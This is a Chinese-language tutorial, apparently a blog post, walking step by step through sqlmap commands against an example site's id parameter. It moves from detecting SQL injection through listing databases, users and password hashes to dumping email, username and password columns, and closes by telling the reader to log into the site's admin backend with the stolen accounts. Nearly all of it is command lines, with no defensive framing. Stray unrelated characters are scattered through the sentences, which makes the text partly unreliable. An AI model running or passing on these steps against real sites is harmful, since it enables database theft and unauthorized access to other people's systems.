一朽褪、檢測注入點(diǎn)是否可用
#sqlmap -u "http://192.168.1.150/products.asp?id=134"
參數(shù):
-u:指定注入點(diǎn)url
其中圖一有若干詢問語句另假,需要用戶輸入[Y/N]吁津,如果你懶得輸入或者不懂怎么輸入可以讓程序自動輸入,只需添加一個參數(shù)即可,命令如下:
#sqlmap -u "http://192.168.1.150/products.asp?id=134" --batch
二、暴庫
#sqlmap -u "http://192.168.1.150/products.asp?id=134" --dbs
參數(shù):
--dbs:dbs前面有兩條杠纲岭,請看清楚抹竹。
三、顯示web當(dāng)前使用的數(shù)據(jù)庫
#sqlmap -u "http://192.168.1.150/products.asp?id=134" --current-db
四荒勇、顯示web數(shù)據(jù)庫當(dāng)前賬戶
#sqlmap -u "http://192.168.1.150/products.asp?id=134" --current-user
五柒莉、列出sqlserver所有用戶
#sqlmap -u "http://192.168.1.150/products.asp?id=134" --users
六、顯示數(shù)據(jù)庫賬戶與密碼(一般是加密的)
#sqlmap -u "http://192.168.1.150/products.asp?id=134" --passwords
七沽翔、列出數(shù)據(jù)庫中的表
#sqlmap -u "http://192.168.1.150/products.asp?id=134" -D tourdata --tables
參數(shù):
-D:指定數(shù)據(jù)庫名稱
--tables:列出表
八兢孝、列出表中字段
#sqlmap -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb --columns
參數(shù):
-D:指定數(shù)據(jù)庫名稱
-T:指定要列出字段的表
--columns:指定列出字段
九、暴字段內(nèi)容
#sqlmap -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" --dump
參數(shù):
-C :指定要暴的字段
--dump:將結(jié)果導(dǎo)出
如果字段內(nèi)容太多仅偎,需要花費(fèi)很多時間跨蟹。可以指定導(dǎo)出特定范圍的字段內(nèi)容橘沥,命令如下:
#sqlmap -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" --start 1 --stop 10 --dump
參數(shù):
--start:指定開始的行
--stop:指定結(jié)束的行
此條命令的含義為:導(dǎo)出數(shù)據(jù)庫tourdata中的表userb中的字段(email,Username,userpassword)中的第1到第10行的數(shù)據(jù)內(nèi)容窗轩。
十、驗證結(jié)果
根據(jù)上述步驟爆出的賬號座咆,登錄網(wǎng)站后臺痢艺,然后就自由發(fā)揮了。